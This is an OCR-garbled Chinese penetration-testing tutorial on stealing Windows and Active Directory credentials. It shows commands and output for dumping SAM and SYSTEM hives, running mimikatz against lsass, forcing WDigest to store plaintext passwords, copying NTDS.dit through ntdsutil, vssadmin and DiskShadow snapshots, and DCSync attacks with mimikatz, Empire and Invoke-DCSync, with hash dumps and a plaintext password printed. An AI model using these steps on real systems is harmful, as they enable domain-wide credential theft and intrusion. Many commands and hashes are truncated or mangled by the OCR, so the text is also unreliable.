下 载 源码 ， 使 用 python2 的 pyinstaller 进 行 编译 


源码 地 址 : https://github.com/dirkjanm/adidnsdump 


编译 : 


pyinstaller2 -F dnsdump.py 





dnsdump .exe -u 域名 \ 域 用 户 -p 域 密 码 域 控 机 器 名 
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实际 效果 


dnsdump.exe -u god\webadmin -p admin!@#45 OWA2010CN-God 


dnsdump.exe -u god\webadmin -p admin!@#45 OWA2010CN-God -r 


使 用 参数 -r， 该 标志 将 对 所 有 未 知 记录 执行 A 查 询 。 此 时 你 会 发 现 ， 之 前 的 ?突然 有 了 记录 


C: \Users\webadmin\Desktop>dnsdump. exe -u god\webadmin ~p admin!@#45 OWA2010CN-God 
¢ [94ml- Jj¢[Om Connecting to host... 
€ [91m 

[ 


]*[Om Binding to host 

]*[Om Bind OK 

-J¢[Om Querying zone for records 
j¢lOm Found 9 records 


ig 
¢[92m[+ 
¢[94m{- 
« [99m[* 


会 在 当前 目录 生成 records.csv 文 件 ， 内 容 如 下 : 





=| records. esvii | 

type,name,ip 

i WebServer,192.168.3.31 
A,SqlServer,i192.169.3.32 

A,owa2010cn-god,192.168.3.21 

Ao mary- PEC 192. 100. 42255 

A,Jack-PC,192.168.3.29 

A,ForestDnsZones,192.168.3.21 

A,fileserv,192.168.3.30 

A,DomainDnsZones,192.168.3.21 

A.0.192.169,3.21 
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用 户 列表 


1016 





1017 


i 


补丁 信息 
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凭证 及 令 牌 票据 
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个 用 户 生成 密码 的 hash 值 ， 数 据 存储 在 注册 表 的 HKLM\SAM 中 。 密 钥 存储 在 
获取 密码 hash， 需 要 SYSTEM 中 的 syskey。 
\SYSTEM 中 的 syskey 


__LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa FJD, 
Data 等 键 值 中 的 内 容 拼接 而 成 
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int YPT & tValue(s SYSKEY *pSyskey) { » A 
DWORD dwSecureBootz^; 
BYTE syskey[:^5]; 
BYTE syskeyPerm[ i6]={ , 9X5, 0x4, 0x2, Oxb, 0x9, Oxd, / / / 1 OXC, t 


int 3s 


if(!RegGetValueEx(HKEY. LOCAL, MACHINE, "SYSTEM\\CurrentControlSet\\Control\\L¢ 
return SYSKEY REGISTRY ERROR; 


if(dwSecureBoot != 1) 
return SYSKEY METHOD NOT IMPL; 


if(!SyskeyGetClassBytes(HKEY LOCAL MACHINE, "SYSTEM\\CurrentControlSet\\Cont 
return SYSKEY REGISTRY ERROR; 


if(!SyskeyGetClassBytes(HKEY LOCAL MACHINE, "SYSTEM\\CurrentControlSet\\Cont 
return SYSKEY REGISTRY ERROR; 


if(!SyskeyGetClassBytes(HKEY LOCAL MACHINE, "SYSTEM\\C 
return SYSKEY REGISTRY ERROR; 





if(!SyskeyGetClassBytes(HKEY LOCAL MACHINE, “SYSTEM\\CurrentControlSet\\Cont 
return SYSKEY REGISTRY ERROR; 


for(i-z0;i«16;it*) 
pSyskey->key[i] = syskey[syskeyPerm[i]]; 


return SYSKEY SUCCESS; 


。 使 用 syskey 解 密 HKLM\SAM 





获得 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 中 每 个 用 户 的 FP 和 V 的 键 值 内 容 ， 
使 用 syskey 进 行 解密 


需要 注意 的 是 ， 以 上 过 程 需要 在 管理 员 权 限 下 进行 。 


离线 读 取 sam 数 据 库 


1. 导出 数据 库 
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Pos 


方法 一 (注册 表 ) : 


reg save HKLM\SYSTEM c:NusersNuserNdesktopNSYSTEM 


reg save HKLMNSAM c: NusersNuserNdesktopNSAM 
方法 二 (复制 文件 ) : 
p 





2. @FAmimikatz 5s tH FB ^ hash 


Isadump:: 


Y mimikatz 2.2.0 x64 (oe.eo) 


Benjamin DELPY 'gentilliwi ( benjamin@gentilkiwi.com ) 
> http://blog.gentilkiwi. EE 

Vincent LE TOUX C vincent. letoux@gmail.com ) 
> http://pingcastle.com / http://mysmartlogon.com ***/ 


mimikatz # lsadump::sam /sam:sam /system:system 
: WIN-O6SP7OEOPFM 
582cfd7aa53bb19b4ee7ab34eb325e59 
> $-1-5-21-1451295774-3188100447-2518427715 


SAMKey : 217b63ba3beff02055d8f7e330ecc218 
: 000001f4 (500) 


: Administrator 
NTLM: 


: 000001f5 (501) 
r i Guest 


: 000003e9 (1001) 
r a USER 
Hash NTLN 


目标 机 器 直接 读 取 


根据 目标 相应 位 数 传 入 mimi， 管 理 员 权 限 启 动 mimikatz 





privilege: 


PW 
tol 
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mimikatz 2.2.0 x64 (oe.eo) p | 


mimikatz # privilege: :debug 
Privilege ‘20° OK 


rimikatz # token: :elevate 

oken Id 6 

User name : 

SID name |: NT AUTHORITYNSYSTEM 


476 {0;000003e7} 0 D 42450 NT AUTHORITY\SYSTEM $-1-5-18 (04g, 20p) Primary 

-> Impersonated ! 

* Process Token : {0;002657c6} 3 F 6855876 WIN-O6SP70EOPFMNuser $-1-5-21-1451295774-3188100447-2518427715-1001 
(149, 23p) Primary 

; Vs Mad > {0;000003e7} 0 D 6920491 NT AUTHORITYNSYSTEM S-1-5-18 (04g, 20p) Impersonation (ol 
elegation 


mimikatz 4 lsadump::sam 
in : WIN-O6SP7OEOPFM 
82cfd7aa53bb19b4ee7ab34eb325e59 
$-1-5-21-1451295774-3188100447-2518427715 


b63ba3beff02055d8f7e330ecc218 


1f4 (500) 
vistrator 
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0 


:.000001f5 (501) 
> Guest 


: 000003e9 (1001) 
yi User, 
Hash NTLM: 57d583aa46d571502aad4bb7aea09c70 





使 用 procdump.exe 进 行内 存 转 储 


作用 : 

微软 维护 工具 ， 主 要 使 用 它 来 进行 内 存 转 储 。Windows 在 运行 的 时 候 不 能 复制 SYSTEM 和 SAM 文 件 
该 方法 只 能 在 Window 2003. Windows 2008, Windows 2008 R2， 且 没有 打 补 本 (KB2871997) 
的 情况 下 可 以 获取 该 系统 在 未 清理 内 存 ( 意 为 未 重启 ) 时 存储 的 登录 信息 凭证 。 


Windows 2012 及 以 上 版 本 需要 开启 注册 表 记 录 明 文 密码 ， 方 可 转 储 。 方法 : 


HKLM:NSYSTEMNCurrentControlSetNControlNSecurityProvidersNDigestBjg"UseLogonCrede 


cmd 修 改 : 


reg add HKEY LOCAL MACHINENSYSTEMNCurrentControlSetNControlNSecurityProvidersNWE 


powershell 修 改 : 


PS C:\> New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityPr 


参考 链接 : 


procdump 语 法 : 


procdump.exe -accepteula -ma lsass.exe c:\windows\tapi\a.dmp 
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explorer. exe 


ismserv. exe 


mimikatz. exe 
mimikatz. exe 
mimikatz, exe 
msdtc. exe 
ntfrs. exe 
powershell... 





ve Mf 
de 下 载 
E 点 面 


需要 administrator 权 限 ， 右 键 创 建 转 储 ， 在 %temp% 目录 下 出 现 lsass.dmp 文 件 拉 回来 ， 用 mimikatz 


ernais 


进程 ms 


iC 





SYSTEM 
SYSTEM 
SYSTEM 
Admin. 
Admin... 
Admin... 
NETWD. .. 
SYSTEM 
Admin. 


包含 到 库 中 v 


T 最 近 访问 的 位 置 


AN Y 
名 称 。 


vmware-Administrator 


lsass. DMP 







Sep emsz eatin 软件 地 址 : 


| 性 能 | 联网 | 用 户 | 
at | 





Windows 
Windows 


Local S.. 


本 地 会 

mimikat 
mimikat 
mimikat 


Microso. 


文件 夏 


Windows 


- 用 户 v Administrator + AppData v Local ~ Temp vr 1 ~ 


Sg Yr pp 





已 成 功 创建 文件 。 


文件 位 于 : 
C: Wsers\ADMINI™1\AppData\Local \Temp\1\lsass. DMP 













修改 日 期 类 型 大 小 


2018/8/19 20:12 ”文件 夹 
2018/10/22 22:41 — IMP 文件 


MIMIKATZ-SEKURLSA :: LogonPasswords 


语法 : 


privilege: 
Sekurlsa:: 
Sekur1s 
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mikatz 2.0 alph 


mimikatz # privilege:: ug 
[Privilege 220? OK 


Authentication Id 


Session 


后 记 


z # sekurisa::logonpasswords 


* 


msu = 
[08888983 I 
* Username 
* Domain 

* LM 

x NTLM 

* SHAL 
tspkg 

* Username 
* Domain 

* Passuord 
udigest 

* Username 
* Domain 

* Passvord 
kerberos = 
* Username 
* Domain 


* Password : 


ssp * 


credman : 


6 ; 333589 C(B88888888:000516c5» 
Interactive from 1 
fidministrator 

NUB 


z $-1—-5-21-34580710754-2804525694-163413949-508 


Primary 
: Administrator 
NUB 
PE A 
: b367819cBa8ccd792cadíd034f56aifa 
: 181d878bcacdac6427eUf eba63927c21058£6a967 


: Administrator 
: NUB 
z ahi23456 
Administrator 
: NUB 
ahi23456 
z Administrator 


: NUB.COM 
ahi23456 


>: Ø ; 997 <GG6686686-G68663e5> 
: Service from @ 


LOCAL SERUICE 


: NT AUTHORITY 
:0971-5-49 


x Username 
* Domain 


* Password : 


kerberos : 
* Username 
* Domain 
* Password 
ssp : 


credman : 


null»? 
€null»5 
null» 


Cnull> 
> Cnull>d 
Cnulld 





其 实 获取 本 地 hash 还 有 很 多 工具 可 以 利用 ， 这 边 分 享 的 是 比较 通用 的 方法 。 
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| 哈 希 值 存储 在 域 管 服务 器 的 NTDS.DIT 的 数据 库 文件 中 ， 除 此 之 外 还 有 用 户 信息 和 组 成 员 
TDS.dit 文 件 无 法 直接 复制 到 其 他 位 置 进行 离线 破解 和 提取 (类 似 于 本 地 存储 的 
M) ， 其 存储 位 置 为 : 


Bers\Administrator>ntdsutil snapshot "list all" quit quit 
ai: snapshot 


Bers\Administrator>ntdsutil snapshot "activate instance ntds" create quit qt 
I1: snapshot 
ectivate instance ntds 


183873 "ntds", 


50f5e34-1952-475b-99ef-30ba80014363]. 
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5e34-1952-475b-99ef -30! 





ik: 机 器 中 有 几 块 硬盘 ， 那 么 就 会 生成 几 个 快照 分 区 ， 快 照 分 区 会 以 $SNAP_ 时 间 _VOLUME{ 分 区 
名 }$ 进行 命名 





SpE C 


组 织 ~ KE ” 新建 文件 赤 
MT 名 称 ~ 修改 日 其 类 型 大 小 
TH PerfLogs 2009/7/14 11:20 XX 
E s Progen Files 2018/8/8 21:38 YX 
-mnai Proga Files (x88) 2018/8/8 21:39 Xt 
E ProgramData 2018/8/8 21:54 文件 来 
RB 视频 Windows 2018/10/11 21:24 文件 夹 
be En 用 户 2018/8/8 20:22 文件 来 
[als $SNAP 201810172200 YOLUMECS 2018/10/17 22:02 WK 83, 884,0... 
ab ET 
-各 计算 机 
tw 网 络 


寻找 ntds.dit 


一 般 情 况 下 会 在 cx\windows\ntds\ 目录 下 









“~ 计算 机 - 本 地 磁盘 (C) - $SNAP 201810112200 VOLUMECS ~ Windows ~ NTIS ow ko [ un 


包含 到 库 中 > HE 


了 收藏 去 名 称 ~ 修改 日 期 类 型 大 小 
x. 下 载 和 edb. chk 2018/10/17 22:00 。 收复 的 文件 碎片 8 KB 
一 桌面 TET Q edb. log 2018/10/17 22:00 ”文本 文档 10,240 KB 
2 最 近 访问 的 位 置 ur 

à. edb00001. log 2018/8/8 21:52 文本 文档 10,240 KB 

(& A edbres00001. jrs 2018/8/8 21:51 TRS 文件 10,240 KB 
RB 视频 A. edbres00002. jrs 2018/8/8 21:51 ges 文件 10,240 KB 
e E [ Jr a a cy 
j d (Botepe 2018/10/11 2124 E Xf ————— 20810 

Lat 

ia 网 络 


注 : 注意 看 时 间 ， 一 定 要 最 近日 期 的 ， 有 一 些 域 控 机 器 上 的 ntds.dit 很 古老 ， 那 么 可 能 是 备份 到 其 他 
目录 下 了 ， 需 要 再 找 一 下 ， 可 能 … 还 会 遇 到 磁盘 空间 不 足 的 情况 ， 自 行 项 酌 。 
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ra LI » > * 
Administrator>copy C:\$ >_201810172200_VOLUMECS\Windows\NTDS\ntds.dit 


oe Pr 


S\Administrator>ntdsutil snapshot "delete (550f5e34-1952-475b-99ef -30ba8e 
ål: snapshot 

delete [550f5e34-1952-475b-99ef -30ba80014363} 
11b38c1255-073f-4124-a32f-75144555c3fd) EUER. 

quit 
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C:NUsersNAdministrator»0; \windows\temp\NTDSDumpex .exe -d Gi \windows\temp\ di 











= 09135AC2D70CO7FQC 








7E TUN p cum UT MUN = = d 
iin ” ”包含 到 库 中 y+ AE v sapie 


p 下 载 | i hash. txt 2018/10/17 22:16 文本 文档 
T "n All een 7 1 071 7 eek ne ee 
, 最 近 访 问 的 位 置 
© NTDSDunpEx. exe 2018/1/1T 23:58 应 用 程序 164 KB 
(E system. hiv 2018/10/17 22:13 HIV 文件 10,712 KB 
E 视频 Š tsec ini 2009/7/14 12:58 RBS 1 KB 
e 图 片 
“文档 
> BUR 
E 计算 机 
te 网 络 


ik: 这 里 hash.txt 就 是 我 们 想 要 的 用 户 hash 


| INN txt — 记事 本 
RA) REE 格式 (0) 查看 WW) 帮助 00 


Administrator:500:aad3b435b5140d4eeaad3b435b5140d4ee:b367819c0a8ccd792cadld034f56alfa::: 
Administrator hist, 0:500:803claT5f91f58aled79e2f9e513887c:b36T819c0a8ccd792cad1d034f56alfa::: 
Administrator hist 1:500:0e474520c66ce9b0e8dlf2b8cd9bda31:98059dde64807559957c91e61544c630: : : 
Administrator hist, 2:500:aad3b435b51404eeaad3b435b51404dee : 31d6cfe0d16ae931b73c59dTe0c089c0: :: 
Guest :501:aad3b435b5140deeaad3b435b51404ee : 31d6cfe0dl6ae931bT3c59dTe0c089c0: : : 
user:1000:aad3b435b5140deeaad3b435b5b1404ee: 32ed8Tbdb5fdcbe9cba8854737681844: : : 
krbtgt:502:aad3b435b5140deeaad3b435b5140dee : £528bcaló6713d9245c0b5383163841£0: : : 

krbtgt hist, 0:502:868cd76a4fd707100240e45163cb2254 : f£528bcal671349245c0b538316e3841£f0::: 
test:1105:aad3b435b51404deeaad3b435b51404ee : ATb£80359a8506cd67 c524a03ff8dbade: :: 

test hist 0:1105:1al3bced5aZe0TfG5f9bOlclcfe24159:4Tbf8039a8506cd67 c524a02f f8dbade::: 

test hist 1:1105:4889dd2eace3e6f094c3b2742aa68731:26981583c1841420993139c7 78822068: : : 

test hist 2:1105:4b84a48c18889ddb05d4c240267fc939:526f680T05bead0e6b172a03837c363e::: 
king:1106:aad3b435b51404eeaad3b435b51404ee :b367819c0a8ccdT92cad1d034f56alfa::: 

king hist 0:1106:elcTf2O06ffcfd21db599076630beac32:b367819c0aBccd792cadld034f56alfa::: 


























拷贝 hash 


全 部 结束 之 后 记得 清理 现场 


小 福利 : 一 句 话 版 本 
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DMIN 卷 影 副本 


旺 Windows 命 令 行 一 种 即便 被 操作 系统 使 用 也 能 够 用 于 管理 员 备份 计算 机 ， 卷 ， 文 件 的 实 
卷 影 复制 作为 服务 运行 ， 并 要 求 将 文件 系统 格式 化 为 NTFS， 默 认 情 况 在 所 有 现代 操作 系 
如 此 。 从 Windows 命 令 提示 符 执 行 以 下 操作 将 创建 C: 驱动 器 盘 的 快照 ， 以 便 用 户 访问 通 
这 些 文件 ， 并 将 其 其 复制 到 另 一 个 位 置 (本 地 文件 夹 ， 网 络 文件 夹 或 可 移动 介质 ) o 


理 员 权限 


Ps\Administrator>vssadmin list shadows 
1.1 - 卷 影 复制 服务 管理 命令 行 工具 
WRI 2001-2005 Microsoft Corp. 


dE ID: {9ddchac4-00c2-4383-add4-abb96e190399} 的 内 容 
在 创建 时 间 ; 2018/9/7 22:48:01 d 1 个 卷 影 副本 

卷 影 副本 ID: [e32bb2a2-5033-40cf-9892-5b4 

maS: g jd 

SoN NN?NGLOBALR 





c 
99c6-80666 


ey? 11 aoGharimnuinmnmny 
«VolumeShadowCopvi 












/ provider 1.0' 


BusersVAdministrator»vssadmin create shadow /forzc: 





a2-5033-40cf -9892-5b49d6f5611c) 
IBALROOT\Device\HarddiskVolumeShadowCopy1 
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/ \\?\GLOBALROOT\Device\Ha rddiskVolumeShadowCopy1\Windows \NTDS\NTDS.dit C:\te 
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\sys 





C:NUsersNAdministrator»copy \\?\GLOBALROOT\Device\HarddiskVol wCopyl \Wine 


~ 








( SersN > e\H INI m 
\ + E k 

cel 1 文件 。 
> 


删除 卷 影 列表 : 


C:NUsersNAdministrato 
vssadmin 1.1 - ERS RRS 
(C) 版 权 所 有 2001-2005 Microsof 








副本 吗 (YXN) : [N]? 


确实 要 删除 1 SVE 
成 功 地 删 了 


| 计算机" BH C) -tp 0 oak. OO o É 


包含 到 库 中 ” HE ” ”新 建文 件 来 = ~ {il @ 
eA 修改 日 期 类 型 A 





k 

ü ntds. dit 2018/8/8 21:53 DIT 文件 18,448 KB 
ü 

AN CR SYSTEM 2018/9/7 22:41 文件 10,752 KB 
了 访问 的 位 置 


打包 拷贝 ! Get 
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账户 哈 希 值 (工具 篇 ) 


账户 哈 希 值 的 续 文 ， 本 文 主要 介绍 利用 工具 获取 域 账 户 hash。 
Ding Domain Password Hashes 

S .DIT 文 件 是 被 系统 使 用 的 ， 因 此 不 能 直接 进行 复制 。 

: (默认 ) : 


SNNTDSNNTDS.dit 


Active Directory 域 服务 配置 向 导 


指定 AD DS Eje m. RSME SYSVOL 的 位 置 


fugEYXGIDI C:\Windows\NTDS 
BEGLAR: CAWindows\NTDS 
SYSVOL X/&xz(Y): C:\Windows\SYSVOL 
FEAT R Active Directory BS 

E 

a [1-20] 下 - 步 D > 


取 该 文件 或 者 提取 文件 中 的 信息 的 方法 有 很 多 ， 大 多 数 使 用 一 下 方法 : 


1. 域 控制 器 复制 服务 
2. 本 地 Windows 二 进 制 文件 
3. WMI 
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账户 哈 希 值 ( 续 ) ii 





Mimikatz 


Mimikatz 具 有 一 项 功能 (dcsync) ， 该 功能 利用 目录 复制 服务 (DRS) 从 NTDS.DIT 文 件 中 查找 密 
码 哈 希 。 这 种 技术 消除 了 直接 向 域 控制 器 进行 身份 验证 的 需要 ， 因 为 它 可 以 从 域 管理 员 的 上 下 文中 
作为 域 一 部 分 的 任何 系统 中 执行 。 因 此 ， 这 是 红色 团队 的 标准 技巧 ， 因 为 动静 较 小 。 





imikatz # lsadump::dcsgnc /domain:pentestlab.local /all /csv 
:pentestlab.local' Will be the domain 
“WIN-PTELU2ZUO7KG pentestlab local will be the DC server 
Exporting domain "pentestlab local” 
krbtgt. d125e4f69c8515290585ec95ca80fa3Te 


HealthMailbox9078d64 
HealthMallbox132c543 
HealthMailboxa236723 
HealthMailboxfc3c1i4f 
HealthMailboxf622cl4 
HealthMailbox?6c9925 
HealthMailboxacd!19a 
HealthMailboxdS23e94 
HealthMallbox7299fd5 
john 
WIN-2NESSKISTGHS 
test 
PENTESTLAB_601 
Rdministrator 
HealthMailbox149f441 
Heal thMailboxab8Sdb67 
WIN-PTELU2UO TKG$ 


fOfF152f80fc7667fec95b3018a83d93a 
376341bdabd38ffa4867269abc21b09a 
96c74d59a86da0126d2ace!le8d21f093 
e97bfi3fibiðfe3a642f7f482ef47bca 
91dfi?be92b5951478d86deb35uc5f 40 
OcOled6bfce33fSei6F851 eG64al 2b0ed 
dd8eaad8bdf3adlaa?43bc6f57965925 
c85babdbadf3cb8ce6288515delbbb7b 
babcfd69ba*43c5f96fb033a40343452c 


O8c6OFd86c43ce4894dab/Sbal f45f44 


TSCTSASSI FE TP 1S9GCTadF311 23919868 


58a478135a93ac3bf058a5ea0e8fdb7] 
S8a478isSa93ac3bFOS8aSeaesfdb7 i 


idSf836aa792725bbc 7aaeal c83FIbab 
§312leff22b751 FS 72d906b26e2a7icd 
a552129cucfda3890bf66c9lccff5bp97 





通过 使 用 /user 参数 指定 域 用 户 名 ，Mimikatz 可 以 转 储 该 特定 用 户 的 所 有 帐户 信息 ， 包 括 其 密码 
哈 希 。 


lsadump::dcsync /domain:pentestlab.local /user:test 


mimikatz # loadump: -desync /domain:pentestlab.local /user:test 
[0C] ‘pentestlab local’ will be the domain 

[DC] - WIN-PTELU2UO7KG pentestlab local” will be the DC server 
[DC] “test > will be the user account 


Object RON test 


xw SAM ACCOUNT xx 


test 

test@pentestlab. local 

30000000 ( USER OBJECT ) 

00010200 (. NORMAL ACCOUNT DONT EXPIRE PASSWD ) 


SRM Username 

ser Principal Name 
Account Type 
ser Account Control 
ccount expiration 
Password last change 
Object Security ID 
Object Relative ID 


1.35 AM 
37340915-2019594255-2513685307-1153 


4/15/2018 2:5 
3137 


$-:125721-3 
1153 


redentials: 

Hash NTLM: S8ak7813Sagsac3bFfeSsaSeasesfdb7) 
ntlm- 0. 58a478135a93ac3bf058a5eaDe8fdb?! 
lm. - 0: 4ace65d0e3d45f67994f10945027c2bb! 
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D 


Kee” 


或 者 避 以 通过 lsass.exe 进 程 转 储 直接 在 域 控制 器 密码 哈 希 中 执行 Mimikatz o 


30919990971 -423310 194490 





Empire 
PowerShell Empire 有 两 个 模块 可 以 通过 DCSync 攻 击 获取 域 哈 希 。 这 两 个 模块 都 需要 有 域 管理 员 权 
限 ， 并 且 它 们 都 使 用 微软 的 复制 服务 。 模 块 依靠 Invoke-Mimikatz PowerShell 脚 本 来 执行 与 


Besync 相 关 的 Mimikatz 命 令 。 以 下 模块 将 域 哈 希 提 取 为 类 似 于 Metasploit hashdump 命 令 输 出 的 格 
Bc 


USemodule credentials/mimikatz/dcsync hashdump 
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(Empire: powershell/credentials/mimikatz desync hashdusp) > execute 
{=} asked DXPK6NLA to rum TASK CMD 308 
[*] Agent DXPK6NLA tasked with task ID 4 
mikatz/dcsync b 


powershell /credentials/mimikatz desync hast mp} > [*] Agent DXPKONLA. r 
eturned results. 


Job started: ZGKRCY 
L*] Valid results returned by 10.90.9.1 


[i* Agent DXPKONLA returned results. 
Administrator: $60: aad3b435b5 1404eeaad3b435651464ee ER 

fac: 2: . 

3uest:501:NONE: :: 

DefaultAccount:503:NONE: : : 

krbtgt :562:aad3b435b5 1464eeaad3b435b5 1464ee: 37a7a8d9b8 14c5eca908617e7 366170 
david: 1104 :aad3b435b651464eeaad3b435651464ee; fa7aicc71793d1794fas0Sedbefe2bef: :: 
fane:1105:aad3b435b5 1464eeaad3b435651404ee: fa7aicc7 1763017841 a9bS6dbefe2bef >: : 





所 述 DCSync 模 块 需要 指定 的 用 户 。 


> usemodule credentials/mimikatz/dcsync 
/credentials/mimikatz/dcesync}) > set user dave 
credent atz/dcsync) > execute 
Tasked OXPK6NLA to run TASK CMO JOB 
] Agent. DXPK6 tasked with task ID 2 
t+}. Vasked agent DXPK6NLA to run module powershell/credentials/mimikatz/dcsync 
(Empire: powershell/credentials/mimikat2z/dcsync) > 


将 获得 以 下 信息 : 


l 
l 


) 
owershel 
1l 
i 





mimikatz(powershell) # lsadump::dcsync /user: jane 
[DC] 'pentestlab.local' will be the domain 

[DC]. *dc.pentestlab.local' will be the DC server 
[DC] 'jane' will be the user account 


Object RDN : Jane 
** SAM ACCOUNT ** 


SAM Username 1 jane 
User Principal Name : jane@pentestlab. local 


Account Type ; 3686060600 ( USER OBJECT ) 

User Account Control : 00010200 ( NORMAL ACCOUNT DONT EXPIRE PASSWD ) 
Account expiration ; 

Password last change : 6/16/2818 3:49:37 PM 

Object Security ID : S-1-$-21-3605764256 - 3919590971 -12338039446-11085 
Object Relative ID : 1105 


Credentials: 
Hash NTLM: favaicc?71703d1704fa9656dbefe2b0ef 
ntim 8: favalcc71703d1764fa9esédbofe2sef 
im. - 0: 7795f6a64bf62be9d773c8ce35679517 





Nishang 


是 一 个 PowerShell 框 架 ， 它 使 红 队 和 渗透 测试 人 员 可 以 对 系统 执行 攻击 性 操作 。 其 中 
脚本 可 以 用 于 自动 提取 所 需 的 文件 : NTDS.DIT，SAM 和 系统 。 这 些 文件 将 解压 缩 到 当前 工作 目录 
或 任何 其 他 指定 的 文件 夹 中 。 


Import-Module .\Copy-VSS.psi 
Copy-VSS 
Copy-VSS -DestinationDir C:\ShadowCopy\ 
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a 
OCZ 


sers \Administrator> Import-Module \Copys 
) s\Administrator> Copy-VSS 

1 file(s) copied. 

1 file(s) copied. 

1 fileG) copied. 


--\users \Administrator> Copy-VSS Dest inationbir C: NShadowCopyN 
1 file(s) copied. 
1 HE copied. 
1 file(s) copied. 

--\users\Administrator> w 





另外 ， 可 以 通过 加 载 PowerShell 扩 展 程 序 从 现 有 的 Meterpreter 会 话 中 执行 脚本 。 


load powershell 
powershell import /root/Copy-VSS.psi 
powershell execute Copy-VSS 


meterpreter » load powershell 
ding extension powershell...Success. 

er > powershell import /root/Copy-VSS.ps1 
successfully imported. No result was returned. 
ter » powershell execute Copy-VSS 

and execution completed: 

1 file(s) copied. 

1 file(s) copied. 

l file(s) copied. 





三 日 脚本 导入 到 现 有 的 Meterpreter 会 话 中 ， 也 可 以 使 用 命令 powershell_shell 建 立 直接 的 
PowerShell 会 话 来 提取 文件 。 


Copy-VSS 
Copy-VSS -DestinationDir C:\Ninja 


VSS 

fite(s) copied. 

file(s) copied. 

file(s) copied. 

VSS -DestinationDir C:\Ninja 


file(s) copied. 
file(s) copied. 
file(s) copied. 





PowerSploit 
PowerSploit 包 含 一 个 PowerShell 脚 本 ， 该 脚本 利用 卷 影 复制 服务 来 创建 可 用 于 提取 文件 的 新 卷 。 


Import-Module .\VolumeShadowCopyTools.ps1 
New-VolumeShadowCopy -Volume C:\ 
Get -VolumeShadowCopy 
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dowCopyToo!s:ps 
BL 


\\?\GLOBAL ROOT Device \HarddiskvalumeshadowCopy2 
\?\GLOBAL ROOT DeviceMarddiskvolumeShadowCopy3 
PS C:\Users Administrator» 





另外 ， 也 可 以 通过 加 载 PowerShell 扩 展 程 序 从 现 有 的 Meterpreter 会 话 中 执行 它 。 


powershell shell 
New-VolumeShadowCopy -Volume C:\ 
Get-VOlumeShadowCopy 


meterpreter » powershell shell 
PS > New-VolumeShadowCopy -Volume C:N 
PS > Get-VolumeShadowCopy 


\\ ?\GLOBALROOT\Device\HarddiskVolumeShadowCopy] 
\\ ?\GLOBALROOT\Device\HarddiskVolumeShadowCopy 10 





然后 可 以 使 用 copy 命 令 将 文件 从 新 卷 复制 到 目标 路 径 。 


Invoke-DCSync 

Invoke-DCSync 是 由 | 利用 PowerView 开 发 的 PowerShell 脚 本 ， 类 似 于 Mimikatz 中 的 
DCSync 方 法 使 用 Invoke-ReflectivePElnjection 和 包装 有 PowerKatz 的 DLL 文件 来 获取 哈 希 值 。 直 接 
执行 该 函数 将 生成 以 下 输出 : 


Invoke-DCSync 


User ID Hash 


Ipentestlab. local krbtgt 502 237a7aBd9b814c5eca908617e736c017d 
ipentestlab.local Administrator 500  8674939c699d4aab719f147bdsd2ff ac 


ipentestlab.local david 1104 fa?alcc71703d1704fa9056db0f e20ef 
ipentestlab. local jane 1105 fa7a1cc71703d1704fa9056dbOf e20ef 





结果 将 被 格式 化 为 四 个 表 :; Domain，User，RID 和 Hash。 但 是 ， 使 用 参数 -PWDumpFormat 执 行 
Invoke-DCSync 将 以 以 下 格式 检索 哈 希 : userid :Im:ntlm::: 


Invoke-DCSync -PWDumpFormat 


T 


rorot: ‘aadb b51404eeaad $h4 35O5 140408: 3/a/ ahd9bb lac bec assol/e/ 36c01/ 022: 
Administrator: $00: aad3b4 35b51404eeaad 3h4 35b51404e 4939c699042aab719f 147bdSd2ffac: : : 
david:1104:aad3b435b51404eeaad1b435b51404ee: fa7a1cc71703d1704f a9056dbOfe20e 

jane: 1105:aad3b435b51404eeaad3b4 35b51404ee: fa7alcc?1703d1704f a9056dbOfe20ef : : : 

PS C:\Users Administrator» 





通过 从 现 有 的 Meterpreter 会 适中 运行 脚本 可 以 实现 相同 的 输出 。 
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User ID Hash 


t krbtgt 502 3787a8d9b814c5e¢a9986176736c017d 
Administrator 509  8674939c699d4aab719f147bd5d2f fac 
david 1184 fa7alcc71763d1704fa96Sé6dbofe2def 
jane 1165 fa7alcc71763d1704fage5édbofe2def 


194:aad3043$b51404eeaad3b435b5 1464ee: fa7al¢cc71763d1704fa9esédbefe2def: ; : 
5: 3ad3b435b51464eeaad3b435b5 1404ee: fa7alcc71703d1764f a9a56dbofe20ef::: 





DiskShadow 


DiskShadow 是 Microsoft 签 名 的 二 进 制 文件 ， 用 于 帮助 管理 员 进 行 与 卷 影 复 制服 务 (VSS) 相关 的 
操作 。 该 二 进 制 文 件 具 有 交互 和 脚本 两 种 模式 ， 因 此 可 以 使 用 一 个 脚本 文件 ， 其 中 将 包含 所 有 必需 
的 命令 ， 以 自动 执行 NTDS.DIT 提 取 过 程 。 脚 本 文件 可 以 包含 以 下 几 行 ， 以 便 创建 新 的 卷 影 副本 ， 
安装 新 驱动 器 ， 执 行 复 制 命令 并 删除 卷 影 副本 。 


ntdsutil 

activate instance ntds 
ifm 

create full C:\ntdsutil 
quit 

quit 


应 当 注 意 ，DiskShadow 二 进 制 /文件 需要 从 C:\WindowslSystem32 路 径 执 行 。 如 果 从 另 一 个 路 径 
调用 该 脚本 ， 则 脚本 将 无 法 正确 执行 。 


diskshadow.exe /s c:\diskshadow. txt 
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直接 从 解释 器 运行 以 下 命令 将 列 出 系统 的 所 有 可 用 卷 影 副本 。 


diskshadow 
LIST SHADOWS ALL 





还 应 该 复制 SYSTEM 注 册 表 配置 单元 ， 因 为 它 包含 用 于 解密 NTDS 文 件 内 容 的 密 钥 。 


reg.exe save hklm\system c:\exfil\system. bak 
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stem CoXextil\system. bak 


40 system bak 
,G40 byte 





WMI 


肖 恩 . 梅 特 卡 夫 (Sean Metcalf) 在 他 的 中 演示 了 可 以 通过 WMI 远程 提取 NTDS.DIT 和 SYSTEM 
文件 。 此 技术 使 用 vssadmin 二 进 制 文件 创建 卷 影 副本 。 


wmic /node:dc /user:PENTESTLAB\David /password:pentestlabi23!! process Ll crea 


est PENTESTLAB> wmic /node de /user :PENTESTLAB\David /password pent 
tt process call create "cad /c ussadmin create shadow /for:C. 2561" 
jin32 Process)-»Create() 


H 


execution successful 
ico of | PARAMETERS 


ProcessId = 4644, 
ReturnUalue = 86; 





